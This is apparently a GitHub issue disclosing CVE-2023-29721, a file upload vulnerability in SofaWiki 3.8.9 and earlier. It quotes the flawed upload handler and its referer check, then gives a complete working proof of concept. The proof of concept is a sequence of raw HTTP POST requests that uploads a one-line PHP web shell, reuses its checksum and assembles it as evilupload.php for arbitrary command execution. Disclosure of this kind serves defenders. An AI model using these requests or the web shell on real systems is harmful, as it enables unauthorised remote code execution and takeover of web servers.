Headline
CVE-2023-29721: [Vuln]There is a file upload vulnerability that leads to command execution. · Issue #27 · bellenuit/sofawiki
SofaWiki <= 3.8.9 has a file upload vulnerability that leads to command execution.
The PHP file an be uploaded directly by matching referer.
// index.php case 'uploadbigfile’: if ($user->hasright('upload’, ‘’) || stristr($swBaseHrefFolder,$referer)) { include 'inc/special/uploadbigfile.php’; }
// uploadbigfile.php
if (isset($_FILES['uploadedfile']) && is_uploaded_file($_FILES['uploadedfile']['tmp_name']))
{
$filename = $_FILES['uploadedfile']['name'];
$newfile = $swRoot.'/site/uploadbig/'.$filename;
move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$newfile);
$checksum = md5_file($newfile);
if ($checksum == $filename)
{
echo 'upload ok '.$filename;
}
else
{
echo 'checksum error filename '.$filename.' checksum '.$checksum. ' length '.filesize($newfile);
unlink($newfile);
}
$_FILES = null;
exit();
}
Send a request package to get checksum.
POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1 Host: 172.16.134.41 Content-Length: 243 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk1tApDzIaBAxp9EH Accept: / Origin: http://172.16.134.41 Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryk1tApDzIaBAxp9EH Content-Disposition: form-data; name="uploadedfile"; filename="idontknow" Content-Type: application/octet-stream
<?php echo system($_REQUEST[“cmd”]);?> ------WebKitFormBoundaryk1tApDzIaBAxp9EH–
- Send three request packets using checksum to create a malicious PHP file.
1st
POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
Host: 172.16.134.41
Content-Length: 283
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfiZ05SNBgGM9pnBh
Accept: */*
Origin: http://172.16.134.41
Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryfiZ05SNBgGM9pnBh
Content-Disposition: form-data; name="checkchunks"
edc4325bdef3f7fb70abd0389e85f6d1
------WebKitFormBoundaryfiZ05SNBgGM9pnBh
Content-Disposition: form-data; name="filename"
evilupload.php
------WebKitFormBoundaryfiZ05SNBgGM9pnBh--
2nd
POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
Host: 172.16.134.41
Content-Length: 266
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk1tApDzIaBAxp9EH
Accept: */*
Origin: http://172.16.134.41
Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryk1tApDzIaBAxp9EH
Content-Disposition: form-data; name="uploadedfile"; filename="edc4325bdef3f7fb70abd0389e85f6d1"
Content-Type: application/octet-stream
<?php echo system($_REQUEST["cmd"]);?>
------WebKitFormBoundaryk1tApDzIaBAxp9EH--
3rd
POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
Host: 172.16.134.41
Content-Length: 574
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfeK0BammsIbqUGBr
Accept: */*
Origin: http://172.16.134.41
Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryfeK0BammsIbqUGBr
Content-Disposition: form-data; name="composechunks"
edc4325bdef3f7fb70abd0389e85f6d1
------WebKitFormBoundaryfeK0BammsIbqUGBr
Content-Disposition: form-data; name="filename"
evilupload.php
------WebKitFormBoundaryfeK0BammsIbqUGBr
Content-Disposition: form-data; name="comment"
test
------WebKitFormBoundaryfeK0BammsIbqUGBr
Content-Disposition: form-data; name="uploadtime"
1
------WebKitFormBoundaryfeK0BammsIbqUGBr
Content-Disposition: form-data; name="start"
0
------WebKitFormBoundaryfeK0BammsIbqUGBr--
- After uploading a malicious PHP file, arbitrary code can be executed.